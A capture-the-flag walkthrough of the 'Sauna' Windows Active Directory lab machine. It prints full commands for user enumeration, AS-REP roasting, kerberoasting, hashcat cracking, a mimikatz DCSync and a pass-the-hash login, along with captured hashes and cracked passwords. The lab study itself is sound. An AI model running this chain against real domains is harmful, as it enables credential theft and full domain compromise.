Enumeration
nmap
As usual, I start with running a nmap scan with sudo nmap -sC -sV -Pn -O 10.129.95.180; sleep 5; sudo nmap -p- -Pn 10.129.95.180; sleep 5; sudo nmap -sU -Pn 10.129.95.180.
nmap scan results
Nmap scan report for 10.129.95.180
Host is up (0.029s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Egotistical Bank :: Home
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-04-08 23:27:02Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019
Aggressive OS guesses: Windows Server 2019 (97%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-04-08T23:27:10
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: -1h00m01s
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.38 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-09 02:27 CEST
Nmap scan report for 10.129.95.180
Host is up (0.029s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49676/tcp open unknown
49688/tcp open unknown
49696/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 104.50 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-09 02:29 CEST
Nmap scan report for 10.129.95.180
Host is up (0.030s latency).
Not shown: 996 open|filtered udp ports (no-response)
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
Results show general Windows Active Directory open ports. For an initial enumeration the most interesting ports are DNS, HTTP and SMB. If I won’t find an attack vector there I would go and enumerate LDAP, RPC and later ADWS.
Additionally from the nmap scan I learn that the domain name is “EGOTISTICAL-BANK.LOCAL” which I added to my /etc/hosts file.
I started with SMB anonymous access bit it didn’t work. I also don’t know the DC name so I will postpone my DNS enumeration for now.
Website
I enumerated the website. Besides the funny theme of it, I found three different forms - newsletter, comment section and a contact form. I tried to provide basic, expected data into them and they all errored out with a 405 page.
405 - HTTP verb used to access this page is not allowed.
The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access.This is a strange behavior. A http verbs like “POST”, “GET”, “PUT”, “DELETE” etc. Do test this behavior out I ran BurpSuite and checked which verbs worked. From my testing the POST request format as a whole is not working and when changed to GET the response code turns to 200.
Due to the POST body turning into a GET parameter, I tried to inject the parameters with SSTI strings, XSS code and finally SQL injections manually but I didn’t create any unexpected behavior. I then saved BurpSuite requests to those 3 forms and forwarded them into sqlmap to further check for vulnerabilities there.
In the meantime I ran a directory and subdomain enumerations with ffuf.
This ffuf -u http://EGOTISTICAL-BANK.LOCAL/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt directory enumeration command returned:
css [Status: 301, Size: 157, Words: 9, Lines: 2, Duration: 28ms]
fonts [Status: 301, Size: 159, Words: 9, Lines: 2, Duration: 30ms]
IMAGES [Status: 301, Size: 160, Words: 9, Lines: 2, Duration: 30ms]
Fonts [Status: 301, Size: 159, Words: 9, Lines: 2, Duration: 27ms]
CSS [Status: 301, Size: 157, Words: 9, Lines: 2, Duration: 31ms]So no interesting directories have been found at the first glance.
ffuf -u http://EGOTISTICAL-BANK.LOCAL/ -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.EGOTISTICAL-BANK.LOCAL" -fs 32797
Showed no new subdomains so the DC hostname is still unknown.
RID bruteforcing
I tried to enumerate other host users with a netexec rid-brute, but it didn’t work. Guest account is either disabled or was denied.
DNS
For the next step I ran the dig command to enumerate some basic information about the domain itself. In a SOA record I found what is most likely the DC name.
EGOTISTICAL-BANK.LOCAL. 3600 IN SOA sauna.EGOTISTICAL-BANK.LOCAL. hostmaster.EGOTISTICAL-BANK.LOCAL. 50 900 600 86400 3600
Besides that, I didn’t find any other useful data there.
LDAP
I checked LDAP with ldapsearch and it worked with an anonymous access ldapsearch -x -H ldap://10.129.95.180/ -b "DC=EGOTISTICAL-BANK,DC=LOCAL". This resulted in some interesting information:
Info:
ms-DS-MachineAccountQuota: 10
msDS-Behavior-Version: 7
msDS-PerUserTrustQuota: 1
msDS-AllUsersTrustQuota: 1000
msDS-PerUserTrustTombstonesQuota: 10
# Hugo Smith, EGOTISTICAL-BANK.LOCAL
dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL
minPwdLength: 7
lockoutThreshold: 0Key facts:
- Each user can create 10 machine account
- Passwords can have minimum of 7 characters
- There are no lockouts
- There is a user “Hugo Smith” on the box
Foothold
fsmith
Looking at the website I found this user mentioned around other people. Seeing as I have basic information about the password policy and I know some users I could consider a bruteforce attack if I won’t find any other valid vector.
Interestingly, on the website there is “Hugo Bear” and “Fergus Smith” but in the LDAP search I found “Hugo Smith”.
I double-checked other options to pivot, but besides running more wordlists for directories, subdomains are performing an IIS tilde enumeration which would a considerable time to setup I could only bruteforce some usernames and later passwords.
I already found a number of usernames on the website and with my LDAP enumeration. I don’t know the format they user in the company so I decided to use username-anarchy to generate a number of common formats with their full names. I tried to create a nice loop with for and while but I couldn’t make it run username-anarchy correctly for some reason. To save some time I just manually swapped the username data in the username-anarchy Sophie Driver >> users.txt command and create the username list that way.
With this list I ran kerbrute userenum -d EGOTISTICAL-BANK.LOCAL --dc sauna.EGOTISTICAL-BANK.LOCAL users.txt and came with two valid users “hsmith@EGOTISTICAL-BANK.LOCAL” and “fsmith@EGOTISTICAL-BANK.LOCAL”.
I took those usernames, created a smaller wordlists having variants with and without the domain attached and ran them against a relatively small wordlists.
Then, I just ran netexec smb 10.129.95.180 -u users.small -p /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10k-most-common.txt.
While this is going, when I used kerbrute I had an idea. I can check for kerberoast and as-rep roastable users.
Nevermind, without any creds, I can only as-rep roast - let’s do it anyway. GetNPUsers.py -request -usersfile users.small -dc-host sauna.EGOTISTICAL-BANK.LOCAL EGOTISTICAL-BANK.LOCAL/ -no-pass
We get one hit really
Loot:
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:c53a1f5178113124e04b6272ff3b310b$e1e03544cd582d16c1a209f6d03eade305d1486987508688163a7e59956eabf6c5fa32f62531f72a4c0086d683e87fe7c112b6029171b747db50cc455a0b7deef4e0af2ec47dddd9fba2875e1ad2023eaa1c0a77fe06d65771e6171aa3650167b3360d9adb98d4e05fa1b78208c715b1bc14d9addab4079e68a3bddfa3173a5bba4f2865f69a746762bb2e42d5847a15ba7312cbd5d63457cf1178e6ec7295fce2895c088076ab2cfee7e47f6e100729a6010faa4ec70cadf185c17c76b56c72b748410da8b3b07e50ce934e309b2897a8c4364c2f4c0e7c05471f70fc9e309df3430315fd02343141e78b496813798e23be753b581de2681ed27b4897d68998
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL@EGOTISTICAL-BANK.LOCAL:113e3f966c27ca16a99365459ace54ea$a20ebb88b9d118baf304c1a5f374bb80655e2e7cbae4ec8fc8ca5b5c99b320b7775219c33d71b3c9535aa86ce96915b972c6d042de65eddbc3692949b91c3413ab41ca8b4923a367ce68f904b3f4c1198d17c3c81b50bb3ec2486018650402c26d8024a37da117bc127e20f1724675b1da7223716fd75258cfa4c9a5ef28916e7d20644ae91110680532fffba712e0ffc40410747e7c3410c56ccbdb351ec2f05feb11f54de652b047afca7b47e770c744b46e8ec9d632e1acd58a5d97819615e6dbf0a05b7d502badde77179c89fcd5c48df80e64eef99b375333c37febe38f2120d4f59e5d50d23168e202fad03c85b6e3a72c28a940ab16557deeb87bd7d6I scraped that data for the user fsmith into a separate file and run it through rockyou.txt hashcat -m 18200 fsmith.asrep /usr/share/wordlists/rockyou.txt.
We got credentials! fsmith:Thestrokes23
I checked different services that the user can access with netexec and found that they can winrm into the host and see some non-default SMB shares.
I went into the host, and grabbed a user flag from there. I did some manual enumeration and didn’t find anything promising. In the /Users file we can see once service account which has an unexpected error message when we try to access their files Cannot find path 'C:\Users\svc_loadnmgr' because it does not exist.
Looking at those SMB shares, one of the custom ones is most interesting as I have write permissions on it, “RICOH Aficio SP 8300DN PCL 6” with a remark “We can’t print money” - let’s check it out.
smbclient -U fsmith "//10.129.95.180/RICOH Aficio SP 8300DN PCL 6". Sadly I can’t view the contents of this share.
Looking at the second one “print$” we can see that it’s likely connected to a printer or to its configuration or internal file structure.
Bloodhound
It all seems to be hinting for like a printerspooler priv-esc vector. Before I decide on my path, let’s check bloodhound first.
bloodhound-python -u fsmith -p 'Thestrokes23' -d EGOTISTICAL-BANK.LOCAL -dc sauna.EGOTISTICAL-BANK.LOCAL -ns 10.129.95.180 -c all; rusthound-ce -d EGOTISTICAL-BANK.LOCAL -u fsmith -p 'Thestrokes23' --zip -c All
Bloodhound shows that:
- “SAUNA.EGOTISTICAL-BANK.LOCAL” computer object has weak supported encryption types
- “HSMITH@EGOTISTICAL-BANK.LOCAL” is kerberoastable
- “SVC_LOANMGR@EGOTISTICAL-BANK.LOCAL” has GetChanges on “EGOTISTICAL-BANK.LOCAL” itself.
Looking at the RICOH Aficio SP 8300DN PCL 6 printer OSINT I see it was related with some vulnerabilities in the past. This is likely something I could use. My current plan of attack is to kerberoast HSmith. Then I will see if he has any additional accesses (like that SMB share), and then look for a printer exploit. I suspect that a successful exploit will drop me into a svc_loanmgr account which I hope has DCSync rights.
Privilege Escalation
hsmith
I start with that kerberoast. First sudo ntpdate 10.129.95.180 to fix the skew, and then GetUserSPNs.py -request-user hsmith -dc-ip 10.129.95.180 EGOTISTICAL-BANK.LOCAL/fsmith:Thestrokes23. Below is the hash.
$krb5tgs$23$*HSmith$EGOTISTICAL-BANK.LOCAL$EGOTISTICAL-BANK.LOCAL/HSmith*$87d4af1eafee29c894d27ab456393742$bdfdc805b821d7aaf3a5aedfae4002a103da6786c62849393f39742c2fd31fa53569e62c5fb1b19d1f9e49168ce774d807127ec4ff8d92937e4a81b7e66ea688c0be7a6c15b23c9fe00e6d1a020581f46d8496ea3526704daf5920b793dfd82304371d6d3c545fa62f6177a32ad861f0a54e4254f06855e3052b30f619a6677c6b2c94687dc7642ad071372c098f94fcada4184fa681d7e09b33c515743518f602ace271d6d97d8dcd79384940272e0d2a8352b4fe95d492e183e47b060e9b3548da2a3912955f3828a37fa2bfbc5d210df19a5e3ccaba94e5f6de442e1f1ae488924b2c0d109ef2a64f7c713ef0de1be16ec3f7310b0a4c477e84b5ce239e476fb8cdafd5023aa0918db59751473c71759c6ab69db9500848bb6506a47c223e72eb4b6f02e1e89f265d0a7e7ca08c28308fd5a8a837ea03a315477b57a1ffa4a04baf5e8f0f75fc4f43e571685fa1f983b03f44de78eafbd2d9f56c3643b55ee6c9d928a935d5cafd4f94ce47c38de6259973a3843f2e2145a159d180191186b157e340f239d9356a6c39d00f5d1e75b3ef77796a775f8ab0a83d2a19da68cd3ef4b977cf23adec084d357e7081b18c66e7979fe1a2074e52a7d416cde0cf4abce3d1f2137278eb1ebc2eb024d8f971fa870adf29e1bb0d07f1e7350d5196767063b4ab7358c0087a7dfc94318a947f23aa81644bfbd0bc067ad88bfd5ff64603a56705b79b8af422ae66f802fa519e07cf3e6fa6c2562a4cff0a76e4f88d1a0ae9503c64056a90b5b5b95037168ee01b1a15152bb9dceb43ac01fa713c4afbdfa35f28d188bda987e4d564dcf68852b0b1fdee4f3aefd3d3d724a11f818b337959ac353d5637236544e7071dcf31dd142f2550b0e3fc5f88e84e097f8844ca9cf0639ebf32874145b1ee79bb13ad9d4027c7650520781652945a811d5f6d35d44fa76937de1f9b2e08d1558615339c9030fd1b321860ca715a091e929f4048bd65fb113745c7d650ee090c5014c3334d3637c729cc2139f418b91270810bdcd2357572af0ab2331afcc4449016f01ecffffff1d8abcdcd77c8c2ef22383db03657aed641d544be2da47b2c5aade8033806821dc89212fbf3e7dc177637403a1f1c4c05878b238ae429f970f127a100d8fc72475be187bed11dbf6aa6e2c6222f86f036532c773c05003d2593fc1f6949c37812ad0b3f9f1034e087b2dc735be9e0934a88c082517fbc85591a61290ff1df4d164e92a8f049919086da586ee9a04cab70538cf2f302de60cbb00a0cba47ec0b88bc0faa267c728479035b29d0ca4099fbea1bb7a93246618875576a171cacbf34f0a117eac91334aeee1009e4fcb6092e20a08fdde8c270828cf09e8f695620adb8bca857b39cc6d5e7b4f7f7157ee3058dI put it into a separate file and run through rockyou.txt with hashcat -m 13100 hsmith.tgs /usr/share/wordlists/rockyou.txt.
I cracked the passwords and it’s “Thestrokes23” the same one as for fsmith. I enumerated this account a bit and it seems to have the same set of rights and permissions as fsmith but lacking in some aspects - lack of winrm for example.
I feel like this is a unintended to follow this new account. I will read up on that printer and think of a plan how to exploit it with my correct credentials. If nothing will come to my mind I will consider looking if I can somehow enable the svc_loanmgr account and maybe run WinPEAS as well.
svc_loanmgr
Promising article. There seems to be also a Metasploit module for it, but I’d rather do it manually.
I studied this article and tried to edit attached scripts but I didn’t feel confident they would work. I went the Metasploit way, I created a meterpreter shell, ran it and caught it with exploit/multi/handler and tried to run the exploit from there. On both x64 and x86 versions of the payload I got information that the payload failed because the architecture didn’t match the environment. I tried migrating the process around to no avail.
I decided to take a step back and run WinPEAS on the target host to look for any alternative ways to priv-esc.
To my surprise, winpeas found clear-text autologon credentials! I don’t think I ever seen them utilized on a box before - svc_loanmanager:Moneymakestheworldgoround!
I checked possible access with netexec but I didn’t find anything. I also struggle to spawn a cmd or PowerShell shell with runas within winrm.
Previously I noted this fact "SVC_LOANMGR@EGOTISTICAL-BANK.LOCAL" has GetChanges on "EGOTISTICAL-BANK.LOCAL" itself.
I will try to run secretsdump.py with the creds I know and maybe I will be able to dump the data.
secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmanager:'Moneymakestheworldgoround!'@sauna.EGOTISTICAL-BANK.LOCAL
I wasn’t able to dump that data and a struggle a lot to understand why the user is not being found by my tools. I search with ldapsearch and enumerated a lot of data. I later realized that the user was names first “svc_loanmanager” but in bloodhound it’s “svc_loanmgr”. I took me too long to admin that mistake. Even though I fixed my secretsdump.py syntax it still would allow me to dump the data.
Administrator
I then double-checked my permissions in bloodhound and proceeded to download mimikatz on the target. I wasn’t able to run it interactively with .\mimikatz.exe as it looped in trying to start mimikatz in that mode. To avoid it, I ran it with one liners like .\mimikatz.exe "lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:Administrator" exit.
This command returned the administrator’s NTLM hash - 823452073d75b9d1cf70ebdf86c7f98e which I used with evil-winrm -i 10.129.95.180 -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e
Closing Thoughts
Sauna is an interesting machine. It goes through a relatively straight-forwards attack path but I fell into a number of false assumptions and rabbit-holes which costed me a lot of time. It’s serves as a great reminder to perform a full enumeration before jumping into any conclusions, to leave no stone upturned and to pay attention to small details.
My first assumption was that the foothold will be related to the website, but at the end it wasn’t really useful besides learning the names of some users. Later I convinced myself that the correct privilege escalation vector will be related to a printer - CVE-2019-19363 to be specific - but it wasn’t it at all. Lastly I wasted a lot of additional time figuring out why “svc_loanmanager” didn’t work, and I didn’t connect the dots that the username was wrong or just edited in the past.
Fun box.